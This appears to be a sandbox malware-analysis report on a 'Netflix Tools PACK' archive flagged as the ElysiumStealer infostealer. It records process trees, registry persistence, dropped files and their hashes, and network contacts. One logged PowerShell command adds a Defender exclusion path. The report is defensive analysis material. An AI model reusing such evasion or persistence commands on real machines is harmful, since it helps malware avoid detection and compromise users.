Analysis Overview
SHA256
1070b4766e0979a8e15ddbd3d0ba27a9d05272027b3a20eaaf9c9fd854f2def7
Threat Level: Known bad
The file Netflix Tools PACK.rar was found to be: Known bad.
Malicious Activity Summary
ElysiumStealer
ElysiumStealer Support DLL
Blocklisted process makes network request
Modifies Windows Firewall
Executes dropped EXE
Drops startup file
Loads dropped DLL
Checks computer location settings
Adds Run key to start application
Drops file in System32 directory
Drops file in Windows directory
Drops file in Program Files directory
Unsigned PE
Enumerates physical storage devices
Program crash
NSIS installer
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Enumerates system info in registry
Suspicious behavior: EnumeratesProcesses
Suspicious use of SetWindowsHookEx
Modifies registry class
Suspicious use of FindShellTrayWindow
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of WriteProcessMemory
MITRE ATT&CK Matrix V6
Analysis: static1
Detonation Overview
Reported
2023-06-23 22:56
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
NSIS installer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral8
Detonation Overview
Submitted
2023-06-23 22:56
Reported
2023-06-23 22:58
Platform
win10v2004-20230621-en
Max time kernel
23s
Max time network
32s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2178924671-3779044592-2825503497-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\NetFlix Checker by xRisky v2\debug\Launcher.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2178924671-3779044592-2825503497-1000\Control Panel\International\Geo\Nation | C:\Windows\IMF\Windows Services.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Startup.lnk | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\NetFlix Checker by xRisky v2\debug\Launcher.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Runtime Explorer.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2178924671-3779044592-2825503497-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Runtime Explorer = "C:\\Windows\\IMF\\\\Windows Services.exe" | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\NetFlix Checker by xRisky v2\debug\Launcher.exe | N/A |
Drops file in Windows directory
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\NetFlix Checker by xRisky v2\debug\Launcher.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\NetFlix Checker by xRisky v2\debug\Launcher.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\IMF\Runtime Explorer.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\NetFlix Checker by xRisky v2\debug\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\NetFlix Checker by xRisky v2\debug\Launcher.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath C:\Windows\IMF\
C:\Windows\IMF\Windows Services.exe
"C:\Windows\IMF\Windows Services.exe" {Arguments If Needed}
C:\Windows\IMF\Secure System Shell.exe
"C:\Windows\IMF\Secure System Shell.exe"
C:\Windows\IMF\Runtime Explorer.exe
"C:\Windows\IMF\Runtime Explorer.exe"
Network
| Country | Destination | Domain | Proto |
| US | 93.184.221.240:80 | | tcp |
Files
memory/464-133-0x00000000006B0000-0x00000000006C4000-memory.dmp
memory/464-134-0x00000000055A0000-0x0000000005B44000-memory.dmp
memory/464-135-0x0000000004FF0000-0x0000000005082000-memory.dmp
memory/464-136-0x0000000004F60000-0x0000000004F6A000-memory.dmp
memory/464-137-0x0000000004FE0000-0x0000000004FF0000-memory.dmp
memory/464-138-0x00000000065C0000-0x000000000663E000-memory.dmp
memory/464-139-0x0000000004FE0000-0x0000000004FF0000-memory.dmp
memory/3160-140-0x0000000002F30000-0x0000000002F66000-memory.dmp
memory/3160-141-0x0000000005B30000-0x0000000006158000-memory.dmp
memory/3160-142-0x0000000005980000-0x00000000059A2000-memory.dmp
memory/3160-143-0x0000000005A20000-0x0000000005A86000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_k2cfj2kh.fup.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3160-149-0x0000000006210000-0x0000000006276000-memory.dmp
memory/3160-150-0x00000000054F0000-0x0000000005500000-memory.dmp
memory/3160-151-0x00000000054F0000-0x0000000005500000-memory.dmp
memory/3160-156-0x0000000006840000-0x000000000685E000-memory.dmp
C:\Windows\IMF\Runtime Explorer.exe
| MD5 | ec70c6f4dc443c5ab2b91d64ae04fa8e |
| SHA1 | 43eb3b3289782fced204f0b4e3edad2ba1b085b7 |
| SHA256 | 276f1bfc6256f4c1ddd544d5a556d299ebddcf200a64ee7c9c3edef686df727d |
| SHA512 | 6217c232edbcf60ae1337120aa9b51956e06f591c660fd720b02fe8abf01923dd4dca28f69ece88c12c705a4c3a392d0cbb6f4f6c6759306123db141ed05d584 |
C:\Windows\IMF\Secure System Shell.exe
| MD5 | 7d0c7359e5b2daa5665d01afdc98cc00 |
| SHA1 | c3cc830c8ffd0f53f28d89dcd9f3426be87085cb |
| SHA256 | f1abd5ab03189e82971513e6ca04bd372fcf234d670079888f01cf4addd49809 |
| SHA512 | a8f82b11b045d8dd744506f4f56f3382b33a03684a6aebc91a02ea901c101b91cb43b7d0213f72f39cbb22f616ecd5de8b9e6c99fb5669f26a3ea6bcb63c8407 |
C:\Windows\IMF\Windows Services.exe
| MD5 | ad0ce1302147fbdfecaec58480eb9cf9 |
| SHA1 | 874efbc76e5f91bc1425a43ea19400340f98d42b |
| SHA256 | 2c339b52b82e73b4698a0110cdfe310c00c5c69078e9e1bd6fa1308652bf82a3 |
| SHA512 | adccd5520e01b673c2fc5c451305fe31b1a3e74891aece558f75fefc50218adf1fb81bb8c7f19969929d3fecb0fdb2cb5b564400d51e0a5a1ad8d5bc2d4eed53 |
memory/464-178-0x0000000006220000-0x0000000006296000-memory.dmp
memory/464-179-0x0000000006200000-0x000000000621E000-memory.dmp
C:\Windows\IMF\Windows Services.exe
| MD5 | ad0ce1302147fbdfecaec58480eb9cf9 |
| SHA1 | 874efbc76e5f91bc1425a43ea19400340f98d42b |
| SHA256 | 2c339b52b82e73b4698a0110cdfe310c00c5c69078e9e1bd6fa1308652bf82a3 |
| SHA512 | adccd5520e01b673c2fc5c451305fe31b1a3e74891aece558f75fefc50218adf1fb81bb8c7f19969929d3fecb0fdb2cb5b564400d51e0a5a1ad8d5bc2d4eed53 |
C:\Windows\IMF\Windows Services.exe
| MD5 | ad0ce1302147fbdfecaec58480eb9cf9 |
| SHA1 | 874efbc76e5f91bc1425a43ea19400340f98d42b |
| SHA256 | 2c339b52b82e73b4698a0110cdfe310c00c5c69078e9e1bd6fa1308652bf82a3 |
| SHA512 | adccd5520e01b673c2fc5c451305fe31b1a3e74891aece558f75fefc50218adf1fb81bb8c7f19969929d3fecb0fdb2cb5b564400d51e0a5a1ad8d5bc2d4eed53 |
memory/2152-194-0x00000000009E0000-0x00000000009F2000-memory.dmp
memory/2152-195-0x0000000005380000-0x0000000005390000-memory.dmp
memory/3160-196-0x00000000054F0000-0x0000000005500000-memory.dmp
memory/3160-197-0x0000000006E00000-0x0000000006E32000-memory.dmp
memory/3160-198-0x000000006F800000-0x000000006F84C000-memory.dmp
C:\Windows\IMF\Secure System Shell.exe
| MD5 | 7d0c7359e5b2daa5665d01afdc98cc00 |
| SHA1 | c3cc830c8ffd0f53f28d89dcd9f3426be87085cb |
| SHA256 | f1abd5ab03189e82971513e6ca04bd372fcf234d670079888f01cf4addd49809 |
| SHA512 | a8f82b11b045d8dd744506f4f56f3382b33a03684a6aebc91a02ea901c101b91cb43b7d0213f72f39cbb22f616ecd5de8b9e6c99fb5669f26a3ea6bcb63c8407 |
memory/3160-209-0x0000000006DE0000-0x0000000006DFE000-memory.dmp
C:\Windows\IMF\Secure System Shell.exe
| MD5 | 7d0c7359e5b2daa5665d01afdc98cc00 |
| SHA1 | c3cc830c8ffd0f53f28d89dcd9f3426be87085cb |
| SHA256 | f1abd5ab03189e82971513e6ca04bd372fcf234d670079888f01cf4addd49809 |
| SHA512 | a8f82b11b045d8dd744506f4f56f3382b33a03684a6aebc91a02ea901c101b91cb43b7d0213f72f39cbb22f616ecd5de8b9e6c99fb5669f26a3ea6bcb63c8407 |
C:\Windows\IMF\Runtime Explorer.exe
| MD5 | ec70c6f4dc443c5ab2b91d64ae04fa8e |
| SHA1 | 43eb3b3289782fced204f0b4e3edad2ba1b085b7 |
| SHA256 | 276f1bfc6256f4c1ddd544d5a556d299ebddcf200a64ee7c9c3edef686df727d |
| SHA512 | 6217c232edbcf60ae1337120aa9b51956e06f591c660fd720b02fe8abf01923dd4dca28f69ece88c12c705a4c3a392d0cbb6f4f6c6759306123db141ed05d584 |
C:\Windows\IMF\Runtime Explorer.exe
| MD5 | ec70c6f4dc443c5ab2b91d64ae04fa8e |
| SHA1 | 43eb3b3289782fced204f0b4e3edad2ba1b085b7 |
| SHA256 | 276f1bfc6256f4c1ddd544d5a556d299ebddcf200a64ee7c9c3edef686df727d |
| SHA512 | 6217c232edbcf60ae1337120aa9b51956e06f591c660fd720b02fe8abf01923dd4dca28f69ece88c12c705a4c3a392d0cbb6f4f6c6759306123db141ed05d584 |
memory/3920-213-0x0000000000DD0000-0x0000000000DE2000-memory.dmp
memory/3160-216-0x0000000008180000-0x00000000087FA000-memory.dmp
memory/3160-217-0x0000000007B40000-0x0000000007B5A000-memory.dmp
memory/3920-219-0x00000000016A0000-0x00000000016B0000-memory.dmp
memory/3160-218-0x000000007F490000-0x000000007F4A0000-memory.dmp
memory/3160-220-0x0000000007BB0000-0x0000000007BBA000-memory.dmp
memory/3160-221-0x0000000007DC0000-0x0000000007E56000-memory.dmp
memory/3160-222-0x0000000007D70000-0x0000000007D7E000-memory.dmp
memory/3160-223-0x0000000007E80000-0x0000000007E9A000-memory.dmp
memory/3160-224-0x0000000007E60000-0x0000000007E68000-memory.dmp
memory/2152-227-0x0000000005380000-0x0000000005390000-memory.dmp
memory/3920-228-0x00000000016A0000-0x00000000016B0000-memory.dmp
Analysis: behavioral19
Detonation Overview
Submitted
2023-06-23 22:56
Reported
2023-06-23 22:59
Platform
win10v2004-20230621-en
Max time kernel
53s
Max time network
59s
Command Line
Signatures
ElysiumStealer
ElysiumStealer Support DLL
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker Shitter By Team-Otimus V3.0\Team-Otimus V3.0\Shitter 3.0.exe | N/A |
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker Shitter By Team-Otimus V3.0\Team-Otimus V3.0\Shitter 3.0.exe |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker Shitter By Team-Otimus V3.0\Team-Otimus V3.0\Shitter 3.0.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker Shitter By Team-Otimus V3.0\Team-Otimus V3.0\Shitter 3.0.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker Shitter By Team-Otimus V3.0\Team-Otimus V3.0\Shitter 3.0.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 372 -p 1708 -ip 1708
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1708 -s 1096
Network
| Country | Destination | Domain | Proto |
| NL | 87.248.202.1:80 | | tcp |
| US | 8.8.8.8:53 | 1.202.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 20.42.65.90:443 | | tcp |
| US | 192.229.221.95:80 | | tcp |
| US | 8.8.8.8:53 | 86.8.109.52.in-addr.arpa | udp |
Files
memory/1708-133-0x0000000000D40000-0x0000000000F44000-memory.dmp
memory/1708-134-0x00000000059A0000-0x00000000059B0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Runtime.MSIL.1.0.0.0\NativePRo.dll
| MD5 | 94173de2e35aa8d621fc1c4f54b2a082 |
| SHA1 | fbb2266ee47f88462560f0370edb329554cd5869 |
| SHA256 | 7e2c70b7732fb1a9a61d7ce3d7290bc7b31ea28cbfb1dbc79d377835615b941f |
| SHA512 | cadbf4db0417283a02febbabd337bf17b254a6eb6e771f8a553a140dd2b04efd0672b1f3175c044a3edd0a911ce59d6695f765555262560925f3159bb8f3b798 |
memory/1708-139-0x00000000059B0000-0x0000000005A4C000-memory.dmp
memory/1708-140-0x0000000006000000-0x00000000065A4000-memory.dmp
memory/1708-141-0x0000000005AF0000-0x0000000005B82000-memory.dmp
memory/1708-142-0x0000000005A60000-0x0000000005A6A000-memory.dmp
memory/1708-143-0x0000000005C80000-0x0000000005CD6000-memory.dmp
Analysis: behavioral27
Detonation Overview
Submitted
2023-06-23 22:56
Reported
2023-06-23 22:58
Platform
win10v2004-20230621-en
Max time kernel
30s
Max time network
37s
Command Line
Signatures
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\bc857adf-f38a-4911-a977-b0b36b5f4336.tmp | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20230623225830.pma | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe | N/A |
Enumerates physical storage devices
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix GC Generator By SpaceXVIII\Gen\GC.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix GC Generator By SpaceXVIII\Gen\GC.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://cracked.to/SpaceXVIII
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffdad7846f8,0x7ffdad784708,0x7ffdad784718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,3742604189501664572,12367309575954001783,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2164 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2140,3742604189501664572,12367309575954001783,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2428 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2140,3742604189501664572,12367309575954001783,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2708 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,3742604189501664572,12367309575954001783,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3588 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,3742604189501664572,12367309575954001783,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3680 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,3742604189501664572,12367309575954001783,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5236 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2140,3742604189501664572,12367309575954001783,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5676 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ff7ae5e5460,0x7ff7ae5e5470,0x7ff7ae5e5480
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2140,3742604189501664572,12367309575954001783,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5676 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,3742604189501664572,12367309575954001783,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5712 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,3742604189501664572,12367309575954001783,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4888 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,3742604189501664572,12367309575954001783,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5928 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,3742604189501664572,12367309575954001783,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5368 /prefetch:1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 112.208.253.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.104.205.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cracked.to | udp |
| US | 172.67.73.245:443 | cracked.to | tcp |
| US | 172.67.73.245:443 | cracked.to | tcp |
| US | 8.8.8.8:53 | 245.73.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 250.255.255.239.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cracked.io | udp |
| US | 104.26.11.133:443 | cracked.io | tcp |
| US | 8.8.8.8:53 | static.cracked.io | udp |
| US | 8.8.8.8:53 | cdnjs.cloudflare.com | udp |
| US | 104.17.24.14:443 | cdnjs.cloudflare.com | tcp |
| US | 8.8.8.8:53 | 133.11.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | static.cracked.to | udp |
| US | 8.8.8.8:53 | 131.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.208.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.24.17.104.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | | udp |
| US | 8.8.8.8:53 | 113.132.60.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.208.79.178.in-addr.arpa | udp |
Files
memory/4380-134-0x00000000005D0000-0x0000000000622000-memory.dmp
memory/4380-135-0x0000000004FE0000-0x0000000004FF0000-memory.dmp
memory/4380-136-0x0000000004FB0000-0x0000000004FCC000-memory.dmp
memory/4380-137-0x0000000005290000-0x0000000005322000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 5a9f76dde5876d055fc0a4a821de6d02 |
| SHA1 | 3cb30f2ff875cff6a4e4be0c7506254e076ad4df |
| SHA256 | 323204c96cf3ed35bb893c2f20a444cd0c7aa0b44749174b7b22ab351b2edf1a |
| SHA512 | b805309fbbc622f2e47c9d4397662713b37879d0ea0602675c0894e655b9dcd34d483a02c6bdb73b5c6ce084ca7523e038104bce428a5bc7be3569c0d18b9091 |
\??\pipe\LOCAL\crashpad_4224_MDUJLRDZKMSMKCRJ
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.ico
| MD5 | e5e3377341056643b0494b6842c0b544 |
| SHA1 | d53fd8e256ec9d5cef8ef5387872e544a2df9108 |
| SHA256 | e23040951e464b53b84b11c3466bbd4707a009018819f9ad2a79d1b0b309bc25 |
| SHA512 | 83f09e48d009a5cf83fa9aa8f28187f7f4202c84e2d0d6e5806c468f4a24b2478b73077381d2a21c89aa64884df3c56e8dc94eb4ad2d6a8085ac2feb1e26c2ef |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
